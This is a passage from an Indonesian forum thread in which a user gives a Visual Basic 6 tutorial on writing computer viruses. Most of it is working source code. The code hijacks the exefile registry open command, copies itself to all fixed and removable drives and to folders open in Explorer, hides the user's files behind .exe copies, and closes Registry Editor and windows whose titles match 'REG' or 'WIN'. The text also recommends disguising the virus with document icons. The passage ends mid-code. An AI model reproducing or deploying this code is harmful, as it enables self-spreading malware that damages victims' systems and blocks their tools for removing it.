    tersebut dapat melangsungkan hidupnya. Kayak mahluk hidup donk? Ya gitulah.

    Dalam visual basic perintah penggandaan dapat dilakukan dengan dua cara:
    1. Menggunakan code standar dalam visual basic. (FileCopy).
    2. menggunakan code API untuk yang akan berinteraksi langsung dengan system
    3. operasi sehingga memungkin perintah dapat berjalan lebih cepat dan selalu
    4. berhasil. (CopyFile).

    Fungsi untuk melakukan pengcopian file
    1. Perintah Copy Visual Basic (FileCopy)
      Dengan perintah perintah peng-copy-an suatu file pada visual basic, kita bias
      membuat suatu fungsi untuk melakukan suatu penggandaan diri dalam suatu virus, tapi fungsi ini tidak 100% berhasil. Dan memakan waktu yang lama jika digunakan untuk melakukan penggandaan dalam jumlah banyak. Perintah ini sebaiknya digunakan jika kita ingin membuat suatu virus yang sederhana.
      Code:
      FileCopy sumber,tujuan
    2. Fungsi API:
      Penggunaan perintah API sangat disaran jika kita ingin membuat suatu applikasi yang professional. Kok Applikasi? Karena fungsi ini biasanya digunakan untuk membuat aplikasi installer yang dibuat oleh suatu perusahaan software. Fungsi API selalu digunakan oleh perusahaan software agar software yang mereka buat bisa langsung berinteraksi dengan system operasi dan bukan berinteraksi dengan sebuah file virtual machine (Contoh : msvbvm60.dll) dimana virtual machine ini berfungsi untuk melakukan hubungan dari suatu applikasi ke system operasi. Jadi baiknya jika aplikasi kita buat langsung berhubungan dengan system operasi sehingga kinerja dari aplikasi yang kita buat tersebut akan sangat baik. Apa hubungannya sama virus? Jika kita bisa membuat virus yang langsung berhubungan dengan system operasi. Selain proses penyebarannya sangat cepat, virus itupun mampu melindungi dirinya dengan sangat baik. Karena ia mempu mengendalikan suatu aplikasi. Apakah aplikasi tersebut perbolehlan untuk dijalankan atau tidak.
      Code:
      Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
      (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
      ByVal bFailIfExists As Long) As Long
      Code:
      CopyFile Sumber,Tujuan,0

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  12. #12
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Bagaimana teknik penyebaran yang baik?
    Tenik penyebaran yang baik yang biasa dilakukan oleh virus adalah
    1. Membaca address bar pada window explorer
      Tehnik ini sangat baik selain proses penyebaran sangat cepat juga tidak
      memerlukan suatu teknik pencarian suatu file. Mengapa tidak memerlukan pencarian? Karena user telah memberikan informasi lokasi suatu file yang dianggap penting oleh user dengan cara membuka folder tersebut menggunakan windows explorer yang selanjutnya digunakan user untuk menjalankan file tersebut. Virus yang mendapatkan lokasi tersebut langsung menggandakan diri kedalamnya. Biasanya penamaan file dari hasil penggandaan virus tersebut diambil dari nama subfolder yang sedang terbuka.
      Fungsi API:
      Code:
      Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
      (ByVal HWND As Long, ByVal wMsg As Long, ByVal wParam As Long, _
      lParam As Any)As Long
      Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
      (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
      Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
      (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
      ByVal lpsz2 As String) As Long
      Public Const WM_GETTEXT = &HD
    2. Membaca seluruh subfolder pada setiap partisi ataupun hanya partisi system saja.
      Cara penggandaan yang satu ini sangat memakan banyak waktu untuk proses penyebaran. Tapi jika penyeberannya berhasil bisa dibayangkan kalau cara penggandaannya berdasarkan subfolder saja untuk satu partisi system saja bisa mencapai ribuan coba kalau user tersebut menggunakan Multi OS dikomputernya. Bayangkan saja!!!. Apalagi kalau system penggandaannya berdasarkan file-file yang ada dipartisi, pasti lebih heboh lagi.
    3. Membaca lokasi file yang dijalankan
      Penggandaan berdasarkan lokasi file yang dijalankan. Cara yang satu ini memang sangat cepat tapi hasil penggandaan tidak sebanyak dari 2 cara diatas. Ini dikarenakan jika user menjalankan suatu aplikasi. Tapi jika user tidak menjalankan suatu aplikasi maka virus tersebut tidak bisa menggandakan dirinya. Biasanya cara ini digunakan untuk menginfeksi suatu file. Biasanya mempunyai hubungan dengan registry.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  13. #13
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Untuk membuat virus yang hebat sangat disarankan untuk menggabungkan
    semua code yang tersebut. Tapi gunakanlah sesuai kebutuhan. Untuk masalah
    pengganbungan saya serahkan kepada anda.

    Agar virus tersebut tidak diketahui sebagai virus. Virus tersebut dapat
    menggunakan icon yang memungkinkan seseorang tidak dapat mengenali apakah itu virus atau bukan. Contoh nya adalah icon: Folder, Word, Exel, File Gambar (jpg, bmp, png, gif), zip, rar, pdf, notepad, application, dll.

    Kode penyebaran dengan mengambil lokasi dari aplikasi yang dijalankan:
    Code:
    'Registry API
    Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
    "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
    phkResult As Long) As Long
    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
    "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
    ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
    ByVal cbData As Long) As Long
    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
    As Long
    Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Private Declare Function SetFileAttributes Lib "kernel32" Alias
    "SetFileAttributesA" (ByVal lpFileName As String, _
    ByVal dwFileAttributes As Long) As Long
    Enum REG
    HKEY_CURRENT_USER = &H80000001
    HKEY_CLASSES_ROOT = &H80000000
    HKEY_CURRENT_CONFIG = &H80000005
    HKEY_LOCAL_MACHINE = &H80000002
    HKEY_USERS = &H80000003
    End Enum
    Enum TypeStringValue
    REG_SZ = 1
    REG_EXPAND_SZ = 2
    REG_MULTI_SZ = 7
    End Enum
    Dim lokasi As String
    Dim NamaFile1 As String
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    NamaFile1 = .EXEName & ".exe"
    End With
    CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
    REG_SZ, "", Chr(&H22) & lokasi & NamaFile1 & Chr(&H22) & " " & _
    Chr(&H22) & "%1" & Chr(&H22) & " %*"
    'Jika parameter pemanggilan virus tidak sama dengan kosong
    If Command$ <> "" Then
    Dim sFilePath As String
    'ambil Path file
    sFilePath = Right$(Command$, Len(Command$) - 1)
    sFilePath = Left$(sFilePath, Len(sFilePath) - 2)
    SetFileAttributes sFilePath, FILE_ATTRIBUTE_HIDDEN Or _
    FILE_ATTRIBUTE_READONLY
    CopyFile App.Path & "\" & App.EXEName & ".exe", _
    NamaPath(sFilePath) & RTrim$(Left(NamaFile(sFilePath), _
    Len(NamaFile(sFilePath)) - 4)) & " .exe", 0
    SetFileAttributes NamaPath(sFilePath) & _
    RTrim$(Left(NamaFile(sFilePath), Len(NamaFile(sFilePath)) - 4)) & _
    " .exe", FILE_ATTRIBUTE_NORMAL
    Shell Command$, vbNormalFocus
    DoEvents
    End If
    'jalankan sekali saja
    If App.PrevInstance Then End
    End Sub
    'dapatkan nama file
    Public Function NamaFile(sPath As String) As String
    On Error Resume Next
    Dim i As Integer
    NamaFile = ""
    i = 0
    If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
    For i = Len(sPath) To 1 Step -1
    If Mid$(sPath, i, 1) = "\" Then
    NamaFile = Right(sPath, Len(sPath) - i)
    Exit Function
    End If
    DoEvents
    Next
    End Function
    'dapatkan nama path
    Public Function NamaPath(sPath As String) As String
    On Error Resume Next
    Dim i As Integer
    NamaPath = sPath
    For i = Len(NamaPath) To 1 Step -1
    If Mid$(NamaPath, i, 1) = "\" Then
    NamaPath = Left$(NamaPath, i)
    Exit Function
    End If
    DoEvents
    Next i
    NamaPath = ""
    End Function
    'Create or Set String Value Registry
    Private Function CreateStringValue(hKey As REG, Subkey As String,
    RTypeStringValue As TypeStringValue, strValueName As String, strData As
    String) As Long
    On Error Resume Next
    Dim ret As Long
    RegCreateKey hKey, Subkey, ret
    CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
    RTypeStringValue, ByVal strData, Len(strData))
    RegCloseKey ret
    End Function
    Pertama kali yang dilakukan virus ketika virus dijalankan adalah menyeting registry pada bagian exefile, dengan begitu ketika seseorang menjalankan aplikasi dengan extensi “*.exe” maka virus akan berjalan dan melakukan pengecekan lokasi aplikasi tersebut dijalankan dan melakukan penyebaran pada lokasi aplikasi tersebut dijalankan.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  14. #14
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Berikut adalah kode penyebaran dengan mencari drive yang tersedia dan melakukan penyebaran pada drive tersebut.

    Sediakan satu buah form dan satu buah module
    Ketikan perintah ini pada form:
    Code:
    CariDrive
    Ketikan perintah ini pada module:
    Code:
    Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" _
    (ByVal nDrive As String) As Long
    Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    'dapatkan drive hardisk dan flashdisk
    Public Function CariDrive() As String
    Dim ictr As Integer
    Dim sAllDrives As String
    Dim sDrive As String
    sDrive = ""
    For ictr = 66 To 90
    sDrive = Chr(ictr) & ":\"
    If GetDriveType(sDrive) = 3 Or GetDriveType(sDrive) = 2 Then
    CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & _
    "virus.exe", 0
    End If
    Next
    End Function

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  15. #15
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Berikut ini kode melakukan penyebaran dengan membaca alamat folder yang dibuka dengan windows explorer dengan membacanya pda addressbar.
    Siapkan satu form, satu timer dengan Interval=1500 dan satu buah module.

    Ketikan perintah ini pada form:
    Code:
    Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
    (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
    Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
    (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
    ByVal lpsz2 As String) As Long
    Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
    (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
    lParam As Any) As Long
    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
    "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
    phkResult As Long) As Long
    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
    "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
    ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
    ByVal cbData As Long) As Long
    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
    As Long
    Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Private Declare Function SetFileAttributes Lib "kernel32" Alias _
    "SetFileAttributesA" (ByVal lpFileName As String, _
    ByVal dwFileAttributes As Long) As Long
    Private Const WM_GETTEXT = &HD
    Private Const REG_DWORD = 4
    Enum REG
    HKEY_CURRENT_USER = &H80000001
    HKEY_CLASSES_ROOT = &H80000000
    HKEY_CURRENT_CONFIG = &H80000005
    HKEY_LOCAL_MACHINE = &H80000002
    HKEY_USERS = &H80000003
    End Enum
    'Create or Set Dword Value Registry
    Public Function CreateDwordValue(hKey As REG, Subkey As String, strValueName
    As String, dwordData As Long) As Long
    On Error Resume Next
    Dim ret As Long
    RegCreateKey hKey, Subkey, ret
    CreateDwordValue = RegSetValueEx(ret, strValueName, 0, REG_DWORD, _
    dwordData, 4)
    RegCloseKey ret
    End Function
    Private Sub Form_Load()
    CariDirectory "C:\", "Tes"
    CreateDwordValue HKEY_CURRENT_USER, _
    "Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState", _
    "FullPathAddress", 1
    End Sub
    Private Sub Timer1_Timer()
    Dim ExploreWClass As Long
    Dim CabinetWClass As Long
    Dim WorkerW As Long
    Dim RebarWindow32 As Long
    Dim ComboBoxEx32 As Long
    Dim ComboBox As Long
    Dim Edit As Long
    Dim temp As String * 255
    Dim temp2 As String * 255
    Dim AlamatFile As String
    Dim JudulCaption As String
    ExploreWClass = FindWindow("ExploreWClass", vbNullString)
    CabinetWClass = FindWindow("CabinetWClass", vbNullString)
    If ExploreWClass = GetForegroundWindow Then
    WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
    SendMessage ExploreWClass, WM_GETTEXT, 200, ByVal temp2
    ElseIf CabinetWClass = GetForegroundWindow Then
    WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
    SendMessage CabinetWClass, WM_GETTEXT, 200, ByVal temp2
    End If
    'dapatkan string pada address bar
    RebarWindow32 = FindWindowEx(WorkerW, 0&, "RebarWindow32", vbNullString)
    ComboBoxEx32 = FindWindowEx(RebarWindow32, 0&, "ComboBoxEx32", _
    vbNullString)
    ComboBox = FindWindowEx(ComboBoxEx32, 0&, "ComboBox", vbNullString)
    Edit = FindWindowEx(ComboBox, 0&, "Edit", vbNullString)
    SendMessage Edit, WM_GETTEXT, 200, ByVal temp
    'ambil lokasi folder yang aktif pada windows explorer
    AlamatFile = Mid$(temp, 1, InStr(temp, Chr$(0)) - 1)
    'ambil caption windows explorer
    JudulCaption = Mid$(temp2, 1, InStr(temp2, Chr$(0)) - 1)
    If AlamatFile <> "" And JudulCaption <> "" Then
    Form1.Print "Judul : " & JudulCaption
    Form1.Print "Address Bar : " & AlamatFile
    CariFile AlamatFile
    End If
    End Sub
    Ketikan perintah berikut pada module
    Code:
    Public Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" _
    (ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
    Public Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" _
    (ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
    Public Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) _
    As Long
    Public Declare Function SetFileAttributes Lib "kernel32" Alias _
    "SetFileAttributesA" (ByVal lpFileName As String, _
    ByVal dwFileAttributes As Long) As Long
    Public Declare Function GetFileAttributes Lib "kernel32" Alias _
    "GetFileAttributesA" (ByVal lpFileName As String) As Long
    Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Public Const FILE_ATTRIBUTE_DIRECTORY = &H10
    Public Const FILE_ATTRIBUTE_HIDDEN = &H2
    Public Const FILE_ATTRIBUTE_READONLY = &H1
    Public Const INVALID_HANDLE_VALUE = -1
    Public Const MAX_PATH = 260
    Public Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
    End Type
    Public Type WIN32_FIND_DATA
    dwFileAttributes As Long
    ftCreationTime As FILETIME
    ftLastAccessTime As FILETIME
    ftLastWriteTime As FILETIME
    nFileSizeHigh As Long
    nFileSizeLow As Long
    dwReserved0 As Long
    dwReserved1 As Long
    cFileName As String * MAX_PATH
    cAlternate As String * 14
    End Type
    'cari file
    Public Function CariFile(Path As String) As Integer
    On Error Resume Next
    Dim FileName As String
    Dim hSearch As Double
    Dim WFD As WIN32_FIND_DATA
    Dim cont As Double
    CariFile = 0
    Selesai = False
    If Right(Path, 1) <> "\" Then Path = Path & "\"
    cont = True
    hSearch = FindFirstFile(Path & "*", WFD)
    If hSearch <> INVALID_HANDLE_VALUE Then
    Do While cont
    FileName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
    Chr$(0)) - 1)
    If (FileName <> ".") And (FileName <> "..") Then
    If Not FILE_ATTRIBUTE_DIRECTORY Then
    If WFD.dwFileAttributes = 128 _
    Or WFD.dwFileAttributes = 32 Then
    If UCase(Right$(FileName, 3)) = "TXT" Then
    SetFileAttributes Path & CariNama(FileName) & _
    " .exe", FILE_ATTRIBUTE_NORMAL
    CopyFile App.Path & "\" & App.EXEName & ".exe", _
    Path & CariNama(FileName) & " .exe", 0
    DoEvents
    SetFileAttributes Path & FileName, _
    FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
    CariFile = CariFile + 1
    DoEvents
    End If
    End If
    End If
    End If
    cont = FindNextFile(hSearch, WFD)
    Loop
    cont = FindClose(hSearch)
    End If
    hSearch = FindFirstFile(Path & "*.*", WFD)
    DoEvents
    End Function
    'cari folder
    Public Function CariDirectory(Path As String, SearchStr As String) As Double
    Dim DirName As String
    Dim DirNames() As String
    Dim nDir As Double
    Dim i As Double
    Dim hSearch As Double
    Dim WFD As WIN32_FIND_DATA
    Dim cont As Double
    If Right(Path, 1) <> "\" Then Path = Path & "\"
    nDir = 0
    ReDim DirNames(nDir)
    cont = True
    hSearch = FindFirstFile(Path & "*", WFD)
    If hSearch <> INVALID_HANDLE_VALUE Then
    Do While cont
    DirName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
    Chr$(0)) - 1)
    If (DirName <> ".") And (DirName <> "..") Then
    If GetFileAttributes(Path & DirName) _
    And FILE_ATTRIBUTE_DIRECTORY Then
    DirNames(nDir) = DirName
    nDir = nDir + 1
    ReDim Preserve DirNames(nDir)
    If UCase(DirName) = UCase(SearchStr) Then
    Dim tamp As String
    CariFile Path & DirName & "\"
    DoEvents
    SetFileAttributes Path & DirName & "\" & _
    NamaFile(Path & DirName) & " .exe", _
    FILE_ATTRIBUTE_NORMAL
    CopyFile App.Path & "\" & App.EXEName & ".exe", _
    Path & DirName & "\" & NamaFile(Path & DirName) & _
    " .exe", 0
    TmpDrv = Left$(Path, 3)
    Exit Function
    End If
    End If
    End If
    cont = FindNextFile(hSearch, WFD)
    Loop
    cont = FindClose(hSearch)
    End If
    If nDir > 0 Then
    For i = 0 To nDir - 1
    CariDirectory Path & DirNames(i) & "\", SearchStr
    Next i
    End If
    End Function
    'cari nama file/folder
    Public Function CariNama(sName As String) As String
    On Error Resume Next
    Dim i As Integer
    i = 0
    For i = Len(sName) To 1 Step -1
    If Mid$(sName, i, 1) = "." Then
    CariNama = Left$(sName, i - 1)
    Exit Function
    End If
    Next
    End Function
    'dapatkan nama file
    Public Function NamaFile(sPath As String) As String
    On Error Resume Next
    Dim i As Integer
    NamaFile = ""
    i = 0
    If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
    For i = Len(sPath) To 1 Step -1
    If Mid$(sPath, i, 1) = "\" Then
    NamaFile = Right(sPath, Len(sPath) - i)
    Exit Function
    End If
    DoEvents
    Next
    End Function
    'dapatkan nama path
    Public Function NamaPath(sPath As String) As String
    On Error Resume Next
    Dim i As Integer
    NamaPath = sPath
    For i = Len(NamaPath) To 1 Step -1
    If Mid$(NamaPath, i, 1) = "\" Then
    NamaPath = Left$(NamaPath, i)
    Exit Function
    End If
    DoEvents
    Next i
    NamaPath = ""
    End Function

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  16. #16
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Serangan

    Setelah virus tersebut melakukan penggandaan ke system, mengubah registry.
    baru virus tersebut melakukan penyerangan (pengerusakan). Serangan virus ini yang sangat ditakuti oleh pengguna computer. Tetapi jika virus tersebut hanya melakukan penyebaran itu bukan masalah karena tidak melakukan pengerusakan.

    Bentuk-bentuk serangan (pengerusakan) yang dilakukan virus:
    1. Menghapus, memindahkan, menyembunyikan dan mengerusak isi file
    2. Infeksi terhadap file, biasanya virus melakukan ini untuk melindungi dirinya dengan cara menempel dirinya pada file yang ingin di infeksi. Biasanya file *.exe, *.com, *.scr , *.doc, *.xls.
    3. Penyembunyian partisi, memformat partisi dan menghapus partisi, bagian pengerusakan yang sangat merugikan orang lain.
    4. Melakukan komunikasi yang terhadap hardware untuk mengacaukan kinerja suatu hardware sehingga memungkinkan terjadi pengerusakan terhadap hardware tersebut. Biasanya yang menjadi sasaran adalah RAM.
    5. Mematikan aplikasi-aplikasi tertentu., hal ini sangat membuat kesal orang yang terserang, karena aplikasi tersebut tidak dapat dijalankan karena aplikasi tersebut telah dimatikan oleh virus. Biasanya aplikasi yang dimatikan tersebut adalah aplikasi yang berhubungan dengan registry, process manager dan antivirus.

    Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering
    digunakan oleh virus untuk melakukan pengerusakan atau untuk melindungi dirinya dari berbagai macam kemungkinan yang dapat membinasakan dirinya.

    Menghapus, memindahkan dan menyembunyikan file merupakan hal yang
    sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan tehnik ini untuk melakukan pengerusakan. Sangat merugikan orang lain adalah menghapus file dan mengerusak isi file.

    Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan. Karena tehnik
    ini cukup sulit dilakukan. Sehingga jarang sekali virus yang menggunakan tehnik ini. Contoh virus yang menggunakan tehnik ini adalah ITZ.

    Melakukan komunikasi terhadap hardware juga sangat jarang. Misalnya
    mengacaukan alamat Port yang ada. Kalau sederhananya mengacau fungsi keyboard dan mouse. Kalau pada keyboard biasanya akan melakukan perubahan kode ascii sehingga apa ditampilkan tidak sesuai dengan diketikan. Sedangkan pada mouse adalah melakukan pergerakan cursor mouse secara otomatis tanpa dikendalikan dan melakukan fungsi pengeclick secara acak.

    Mematikan aplikasi-aplikasi tertentu. Saat ini hampir semua jenis virus memiliki
    kemampuan ini untuk melindungi dirinya sehingga sulit bagi antivirus atau program sejenis untuk berjalan, karena jika aplikasi tersebut berjalan maka sang virus akan langsung mematikan aplikasi tersebut.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  17. #17
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Berikut ini adalah beberapa kode yang dapat digunakan virus untuk melakukan
    penyerangan.

    Kode Penyerangan1:
    Code:
    Siapkan satu buah form
    Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
    "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
    phkResult As Long) As Long
    Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
    "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
    ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
    ByVal cbData As Long) As Long
    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
    As Long
    Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Private Declare Function SetFileAttributes Lib "kernel32" Alias _
    "SetFileAttributesA" (ByVal lpFileName As String, _
    ByVal dwFileAttributes As Long) As Long
    Enum REG
    HKEY_CURRENT_USER = &H80000001
    HKEY_CLASSES_ROOT = &H80000000
    HKEY_CURRENT_CONFIG = &H80000005
    HKEY_LOCAL_MACHINE = &H80000002
    HKEY_USERS = &H80000003
    End Enum
    Enum TypeStringValue
    REG_SZ = 1
    REG_EXPAND_SZ = 2
    REG_MULTI_SZ = 7
    End Enum
    Dim lokasi As String
    Dim namafile As String
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    namafile = .EXEName & ".exe"
    End With
    CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
    REG_SZ, "", Chr(&H22) & lokasi & namafile & Chr(&H22) & " " & Chr(&H22) & _
    "%1" & Chr(&H22) & " %*"
    'Jika parameter pemanggilan virus tidak sama dengan kosong
    If Command$ <> "" Then
    If InStr(1, Command$, "Setup") <> 0 _
    Or InStr(1, Command$, "winzip") <> 0 _
    Or InStr(1, Command$, "Anti") <> 0 _
    Or InStr(1, Command$, "virus") <> 0 _
    Or InStr(1, Command$, "Regedit") <> 0 _
    Or InStr(1, Command$, "word") <> 0 Then
    Shell Command$, vbNormalFocus
    DoEvents
    End If
    End If
    'jalankan sekali saja
    If App.PrevInstance Then End
    End Sub
    'Create or Set String Value Registry
    Private Function CreateStringValue(hKey As REG, Subkey As String,
    RTypeStringValue As TypeStringValue, strValueName As String, strData As
    String) As Long
    On Error Resume Next
    Dim ret As Long
    RegCreateKey hKey, Subkey, ret
    CreateStringValue = RegSetValueEx(ret, strValueName, 0, RTypeStringValue,
    ByVal strData, Len(strData))
    RegCloseKey ret
    End Function
    Kode penyerangan2:
    Siapkan satu buah form dan satu buah timer dengan Interval=100.
    Code:
    Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
    (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
    Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
    (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any)
    As Long
    Private Const WM_CLOSE = &H10
    Private Sub Timer1_Timer()
    Dim FW As Long
    FW = FindWindow(vbNullString, "Registry Editor")
    If FW Then SendMessage FW, WM_CLOSE, 0, 0
    End Sub
    Kode Penyerangan3:
    Siapkan satu buah form dan satu buah timer dengan Interval=100.
    Code:
    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
    (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
    lParam As Any) As Long
    Private Const WM_CLOSE = &H10
    Private Const WM_GETTEXT = &HD
    Private Sub Timer1_Timer()
    Dim FW As Long
    FW = GetForegroundWindow
    If FW Then
    Dim buff As String * 255
    SendMessage FW, WM_GETTEXT, 255, ByVal buff
    buff = Left$(buff, InStr(1, buff, Chr$(0)) - 1)
    If InStr(1, UCase(buff), "REG") <> 0 _
    Or InStr(1, UCase(buff), "WIN") <> 0 Then
    SendMessage FW, WM_CLOSE, 0, 0
    End If
    End If
    End Sub
    Kode Penyerangan4:
    Siapkan satu buah form dan satu buah timer dengan Interval=100.
    Code:
    Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
    ByVal nCmdShow As Long) As Long
    Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
    (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
    Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
    (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
    lParam As Any) As Long
    Private Const WM_GETTEXT = &HD
    Private Const SW_HIDE = 0
    Private Sub Timer1_Timer()
    Dim FW1 As Long
    Dim FW2 As Long
    FW1 = FindWindow("ExploreWClass", vbNullString)
    FW2 = FindWindow("CabinetWClass", vbNullString)
    If FW1 <> 0 Or FW2 <> 0 Then
    Dim cap1 As String * 255
    Dim cap2 As String * 255
    SendMessage FW1, WM_GETTEXT, 255, ByVal cap1
    SendMessage FW2, WM_GETTEXT, 255, ByVal cap2
    cap1 = Left$(cap1, InStr(1, cap1, Chr$(0)) - 1)
    cap2 = Left$(cap2, InStr(1, cap2, Chr$(0)) - 1)
    If InStr(1, UCase(cap1), "WINDOWS") Then
    ShowWindow FW1, SW_HIDE
    End If
    If InStr(1, UCase(cap2), "WINDOWS") Then
    ShowWindow FW2, SW_HIDE
    End If
    End If
    End Sub
    Kode Penyerangan5:
    Siapkan satu buah form, satu buah timer dengan Interval=100 dan satu buah module.
    Ketikan pada form1:
    Code:
    Private Sub Timer1_Timer()
    TaskProses
    End Sub
    ....

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  18. #18
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Ketikan pada module:
    Code:
    Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
    (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
    Public Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As
    Long, uProcess As PROCESSENTRY32) As Long
    Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long,
    uProcess As PROCESSENTRY32) As Long
    Public Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
    Public Declare Function TerminateProcess Lib "kernel32" _
    (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
    Public Declare Function OpenProcess Lib "kernel32" _
    (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
